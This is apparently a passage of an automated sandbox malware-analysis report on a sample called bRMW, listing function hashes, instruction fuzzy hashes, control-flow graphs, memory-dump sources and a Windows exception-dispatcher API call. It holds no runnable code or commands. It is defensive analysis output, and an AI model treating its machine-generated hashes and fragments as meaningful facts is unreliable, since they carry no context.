                                                                                                • Opcode ID: d26425a3b9b937a9874e0205115dcf7101c5cff18dbc4491aaee873e3dbc57aa
                                                                                                • Instruction ID: 9aa8a727e56a3023a6d70b564ae5459b2bdedc12ef2e5203846d13c317501f74
                                                                                                • Opcode Fuzzy Hash: d26425a3b9b937a9874e0205115dcf7101c5cff18dbc4491aaee873e3dbc57aa
                                                                                                • Instruction Fuzzy Hash: 6B21B3B5D002099FDB10CFAAD585AEEBBF5FB48310F14845AE918A3250D378AA54CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 409 31d3b40-31d3b81 KiUserExceptionDispatcher 413 31d3b84-31d3b8a 409->413 414 31d3caf-31d3cce 413->414 415 31d3b90-31d3b93 413->415 416 31d3b95-31d3bf3 call 31d33e0 415->416 421 31d3c3a-31d3c3d 416->421 422 31d3bf5-31d3c06 416->422 421->414 423 31d3c3f-31d3c45 421->423 429 31d3c08-31d3c2f 422->429 430 31d3c37 422->430 423->416 426 31d3c4b-31d3c52 423->426 427 31d3c54-31d3c6b 426->427 428 31d3ca0-31d3caa 426->428 427->414 435 31d3c6d-31d3c77 427->435 428->413 429->430 430->421 436 31d3c79-31d3c7e 435->436 437 31d3c92-31d3c98 435->437 436->414 439 31d3c80-31d3c8a 436->439 437->428 439->437
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 031D3B62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453359957.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_31d0000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 848efd90c01adcb90ad547bc22ee76d81e87af0c13a4de6f7e9ad95f4197d966
                                                                                                • Instruction ID: 373925bf3f327ffe14223abb24df60621ac5eec927c57427261715c7a5b03ea0
                                                                                                • Opcode Fuzzy Hash: 848efd90c01adcb90ad547bc22ee76d81e87af0c13a4de6f7e9ad95f4197d966
                                                                                                • Instruction Fuzzy Hash: C541A336B006268FCB04EB39D8845ADF7B6BFC8301B09C636D46997294DB389D81DBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 443 31d3b30-31d3b3d 444 31d3b40-31d3b6f KiUserExceptionDispatcher 443->444 446 31d3b77-31d3b81 444->446 448 31d3b84-31d3b8a 446->448 449 31d3caf-31d3cce 448->449 450 31d3b90-31d3b93 448->450 451 31d3b95-31d3b97 call 31d33e0 450->451 454 31d3b9c-31d3bf3 451->454 456 31d3c3a-31d3c3d 454->456 457 31d3bf5-31d3c06 454->457 456->449 458 31d3c3f-31d3c45 456->458 464 31d3c08-31d3c2f 457->464 465 31d3c37 457->465 458->451 461 31d3c4b-31d3c52 458->461 462 31d3c54-31d3c6b 461->462 463 31d3ca0-31d3caa 461->463 462->449 470 31d3c6d-31d3c77 462->470 463->448 464->465 465->456 471 31d3c79-31d3c7e 470->471 472 31d3c92-31d3c98 470->472 471->449 474 31d3c80-31d3c8a 471->474 472->463 474->472
                                                                                                APIs
                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 031D3B62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453359957.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_31d0000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID: DispatcherExceptionUser
                                                                                                • String ID:
                                                                                                • API String ID: 6842923-0
                                                                                                • Opcode ID: 6381e664bd5525ed0fcbada9e842d8374fcc52cd5f3245b38ccc9bba626608b9
                                                                                                • Instruction ID: 6d3bad0d3bdc981e92d05d185b1682d23f4f329f7d3c9068dd71baaaf67e46e6
                                                                                                • Opcode Fuzzy Hash: 6381e664bd5525ed0fcbada9e842d8374fcc52cd5f3245b38ccc9bba626608b9
                                                                                                • Instruction Fuzzy Hash: 7B41C636B00A269FCB08DB35D8846ADF7B6BF88301F09C625D46897394DB389D81D7D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453068293.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_18ed000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 12a47d5820745910a10b7651220a986efef66d91da1db6a0edf1b6a537d45140
                                                                                                • Instruction ID: dc7c724f6fff62b7c14bb14982896c86f95be214a3427ac20dbcde900461298e
                                                                                                • Opcode Fuzzy Hash: 12a47d5820745910a10b7651220a986efef66d91da1db6a0edf1b6a537d45140
                                                                                                • Instruction Fuzzy Hash: 38214571100204DFDB15DF58D9C8F66BFA5FBA9318F20C669E9098B256C33AE50AC7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453068293.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_18ed000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dd20ac45343437b4686cf0f04bf70879337279125fde0c6f7b2e3bea5a7ffedc
                                                                                                • Instruction ID: 2258e307af582f5b2d0c7fcd3a2c8b1c94f187d108adaa64af79815aba0ded73
                                                                                                • Opcode Fuzzy Hash: dd20ac45343437b4686cf0f04bf70879337279125fde0c6f7b2e3bea5a7ffedc
                                                                                                • Instruction Fuzzy Hash: CA214871500204DFDB05DF58D9C4F26BFA5FB99318F20C669E9094B256C33AD54ACBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453163527.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_30ad000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 69f6db000d986f2608de556c42497ea66d6c3a40f66f8c553f2bdcb4cc802ee9
                                                                                                • Instruction ID: ba1f3e589bc2f0a2ed26d53aaff8793776c4eab4d474b47aae0ddece52bf2ecb
                                                                                                • Opcode Fuzzy Hash: 69f6db000d986f2608de556c42497ea66d6c3a40f66f8c553f2bdcb4cc802ee9
                                                                                                • Instruction Fuzzy Hash: AE212271604600DFCB14DFA8E990F26BFA9FB88314F24C9A9D90A4B656C33AD407DA61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453163527.00000000030AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 030AD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_30ad000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e1331f7ba7a7ad2c166971555b5a4942fe920e9fc75e5f499419a1e191bca6b
                                                                                                • Instruction ID: cdba7a6d0fb7e23bd8452ebe74f5feef1876af19518732f08d8c0d7b54c8898f
                                                                                                • Opcode Fuzzy Hash: 3e1331f7ba7a7ad2c166971555b5a4942fe920e9fc75e5f499419a1e191bca6b
                                                                                                • Instruction Fuzzy Hash: 5021C5714087809FCB02CF54D994B11BFB1EF46314F28C5DAD8498F6A7C33A9806DB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453068293.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_18ed000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                • Instruction ID: 55e85e9f165e87843967eb1f6ba2afb296445fb1b1014dc3270f0edd30b1dba0
                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                • Instruction Fuzzy Hash: 5D113372400240CFCB02CF04C5C8B56BFB2FB94324F24C6A9E8094B217C336E41ACBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453068293.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_18ed000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                • Instruction ID: 84a7235bdc17cc8e0eab5d25975e8280582a0a10e7006a4f1eb2b820d0c04bf0
                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                • Instruction Fuzzy Hash: 20110376404280CFCB02CF54D9C4B16BFB1FB88314F24C6A9E9094B257C336D55ACBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453359957.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_31d0000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Xaq$`W)$$]q
                                                                                                • API String ID: 0-2726260255
                                                                                                • Opcode ID: f5cdfb790e20461b752dba1008996ea33bd3394a630400cec042ecbe32ce72e9
                                                                                                • Instruction ID: f41fe42a314dd31b7300442fba3be248cab67540f011c93ddab892705699b2b7
                                                                                                • Opcode Fuzzy Hash: f5cdfb790e20461b752dba1008996ea33bd3394a630400cec042ecbe32ce72e9
                                                                                                • Instruction Fuzzy Hash: E9C1D375B002188FCB18EF7994546AFBBB6BF89700F15842AD447E7388DF389841CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.4453359957.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_31d0000_bRMW.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ba5451d4a5b3bf2ee44f0bbd912b71415a1bba40f4bcafe71b97df14d4075312
                                                                                                • Instruction ID: d6cf04e8529c1965da83a44317274de3f82643fa9683b9f009d5696f89215a77
                                                                                                • Opcode Fuzzy Hash: ba5451d4a5b3bf2ee44f0bbd912b71415a1bba40f4bcafe71b97df14d4075312
                                                                                                • Instruction Fuzzy Hash: 46A16036E003159FCF19DFB5D84459EBBB2FF8A300B15856AE806AF251DB31EA46CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%